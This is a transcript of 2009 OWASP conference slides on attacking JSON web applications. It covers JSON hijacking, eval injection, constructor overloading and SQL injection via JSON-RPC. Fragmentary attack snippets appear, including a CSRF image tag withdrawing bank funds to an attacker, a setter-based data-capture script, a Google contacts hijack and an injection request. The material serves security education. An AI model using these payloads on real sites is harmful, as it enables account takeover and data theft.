testing json applications for security holes.pptsecuritybyte.org/2009/schedule/day2_tulip_i/testing...
TRANSCRIPT
Testing JSON Applications for Security
Holes
Securitybyte & OWASP Confidential
Holes
Aviram Jenik
CEO
Beyond Security
Who am I?
� CEO of Beyond Security:
– We develop automated security testing tools:
• Network vulnerability assessment/management
• Automated Web Site Security Scans
• Blackbox testing/fuzzing
– We operate and maintain SecuriTeam.com
Securitybyte & OWASP Confidential 2Securitybyte & OWASP AppSec Conference 2009
– We operate and maintain SecuriTeam.com
• One of the largest vulnerability databases on the net
• Publish vulnerability information and exploit code
• Open and free
– SecuriTeam Secure Disclosure
• Paying researchers who find 0-day vulnerabilities
• Giving customers early-access to this information
So what do I do?
� I've been doing security for 23 years
� Focusing on Vulnerability research/security
testing
Securitybyte & OWASP Confidential 3Securitybyte & OWASP AppSec Conference 2009
Attacking vs. securing
� I'm going to concentrate on the attacks
� You should figure out how to secure
“If you know the enemy and know yourself
you need not fear the results of a
Securitybyte & OWASP Confidential 4Securitybyte & OWASP AppSec Conference 2009
you need not fear the results of a
hundred battles. “ - Sun Tzu, art of war
What is JSON?
If you don't know what JSON is go hear SID
talk about Oracle attacks or John speak
about critical infrastructure
Securitybyte & OWASP Confidential 5Securitybyte & OWASP AppSec Conference 2009
What is JSON?
� A way to transfer data in a structured
format – alternative to XML
� Popular in interactive AJAX programs
– Used by Yahoo and Google
Securitybyte & OWASP Confidential 6Securitybyte & OWASP AppSec Conference 2009
– Used by Yahoo and Google
Problem #1: Cross domain reference
JSON script can be called across domains
Securitybyte & OWASP Confidential 7Securitybyte & OWASP AppSec Conference 2009
JSON code sample
var object;
var json = new XMLHttpRequest();
json.open("GET", "/object.json",true);
json.onreadystatechange = function () {
Securitybyte & OWASP Confidential 8Securitybyte & OWASP AppSec Conference 2009
json.onreadystatechange = function () {
if (json.readyState == 4) {
var res = json.responseText;
object = eval("(" + res + ")");
}
};
json.send(null);
HTTP Request
GET /object.json HTTP/1.1
Host: www.example.com
Cookie:
JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J
Securitybyte & OWASP Confidential 9Securitybyte & OWASP AppSec Conference 2009
JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J
5SQZTr4a5YJaSbAiTnRR
HTTP Response
HTTP/1.1 200 OK
Cache-control: private
Content-Type: text/javascript; charset=utf-
8
Securitybyte & OWASP Confidential 10Securitybyte & OWASP AppSec Conference 2009
8
[{"name":"Bill Gates", "exp":"11/19",
"cardnum":"46358472617283",
"amount":10000.00, "cvv":"876" },
{"name":"Steve Jobs", "exp":"12/09",
"cardnum":"550023847262637",
"amount":99.99, "cvv":"123" },
Problem
Cookie relates to the page where the JSON
function runs, not where it is called
Securitybyte & OWASP Confidential 11Securitybyte & OWASP AppSec Conference 2009
Problem
Cookie relates to the page where the JSON
function runs, not where it is called
<img
Securitybyte & OWASP Confidential 12Securitybyte & OWASP AppSec Conference 2009
<img
src="http://bank/withdraw?account=victi
m&amount=1000000&for=evilhacker">
Attack example
<script>
function Object() {
this.email setter = captureObject;
}
// Send the captured object back to the
Securitybyte & OWASP Confidential 13Securitybyte & OWASP AppSec Conference 2009
// Send the captured object back to the
attacker's Web site
function captureObject(x) {
var objString = "";
for (fld in this) {
objString += fld + ": " + this[fld] + ", ";
}
objString += "email: " + x;
Google CSRF Vulnerability
<script type="text/javascript">
function google(data){
var emails, i;
for (i = 0; i <data.Body.Contacts.length;
Securitybyte & OWASP Confidential 14Securitybyte & OWASP AppSec Conference 2009
for (i = 0; i <data.Body.Contacts.length;
i++) {
mails += "<li>" +
data.Body.Contacts[i].Email + "";
}
document.write("<ol>" + emails +
"</ol>");
OT: Google vulnerability ACK procedure
1. Deny
2. Downplay
3. Fix silently
4. Ignore
Securitybyte & OWASP Confidential 15Securitybyte & OWASP AppSec Conference 2009
4. Ignore
OT: Google vulnerability ACK procedure
1. Deny
2. Downplay
3. Fix silently
4. Ignore
Securitybyte & OWASP Confidential 16Securitybyte & OWASP AppSec Conference 2009
4. Ignore
We have reported a DoS attack to google that is still
in step 1
Pre-condition for attack
1. Ask victim to visit my page
2. Victim must be “logged in” to a google
service
Securitybyte & OWASP Confidential 17Securitybyte & OWASP AppSec Conference 2009
Nice twist
Brute force gmail
password
(unauthenticated
Securitybyte & OWASP Confidential 18Securitybyte & OWASP AppSec Conference 2009
(unauthenticated
sessions):
<img
src="https://www.google.com/accounts/U
pdatePasswd?service=mail&hl=en&group1
Problem #2: eval
� JSON is read via an “eval” command:var p = eval("(" + contact + ")");
� If we place javascript code in “contact”
we can cause the browser to execute our
code under the trusted domain
Securitybyte & OWASP Confidential 19Securitybyte & OWASP AppSec Conference 2009
code under the trusted domain
– Steal Cookies
– Cookie = session = login
– Change page text
Problem #3: Function overloading
function Array() {
this[1] = 50;
}
Securitybyte & OWASP Confidential 20Securitybyte & OWASP AppSec Conference 2009
}
var a = [40];
alert(a[0] + a[1]); // Gives 90
Problem #4: Code and data are mixed
� Hash/list is basically javascript
� Replace an existing Hash value with
script
� Wait for the value to be used => pwned
Securitybyte & OWASP Confidential 21Securitybyte & OWASP AppSec Conference 2009
� Wait for the value to be used => pwned
Problem #5
� JSON is structured data
� Tempting to directly read/write to db
� SQL Injection may be possible
Securitybyte & OWASP Confidential 22Securitybyte & OWASP AppSec Conference 2009
SQL Injection via JSON
POST http://www.example.com/itemcheck.ashx
HTTP/1.1
[...]
X-JSON-RPC: getItem
[...]
Securitybyte & OWASP Confidential 23Securitybyte & OWASP AppSec Conference 2009
[...]
{"id":1,"method":"getItem","params":{ "id" : "--"}}
*Example taken from Blueinfy. See web2fuzz.pdf for more info
SQL Injection via JSON
HTTP/1.1 200 OK
[…]
{"id":1,"error":{"name":"JSONRPCError","message":"
Incorrect syntax near
'='.","errors":[{"name":"SqlException","message":"
Securitybyte & OWASP Confidential 24Securitybyte & OWASP AppSec Conference 2009
'='.","errors":[{"name":"SqlException","message":"
Incorrect syntax near '='."}]}}
*Example taken from Blueinfy. See web2fuzz.pdf for more info
Variation: fuzzing JSON data
� Client trust problem
Securitybyte & OWASP Confidential 25Securitybyte & OWASP AppSec Conference 2009
Variation: fuzzing JSON data
� Client trust problem
Fuzzing examples:
� Non-array where an array is expected
Securitybyte & OWASP Confidential 26Securitybyte & OWASP AppSec Conference 2009
� Large/negative numbers
� Symbols like @'”%? --
Can of worms
More problems which were not discussed:
� Spoofing the referrer
� Reading server headers
Securitybyte & OWASP Confidential 27Securitybyte & OWASP AppSec Conference 2009
JSONP
� JSONP (JSON w/ padding) by definition
allows reading scripts from another site
and attacks on it are trivial
Securitybyte & OWASP Confidential 28Securitybyte & OWASP AppSec Conference 2009
Thank you!
Securitybyte & OWASP Confidential 29Securitybyte & OWASP AppSec Conference 2009
www.beyondsecurity.com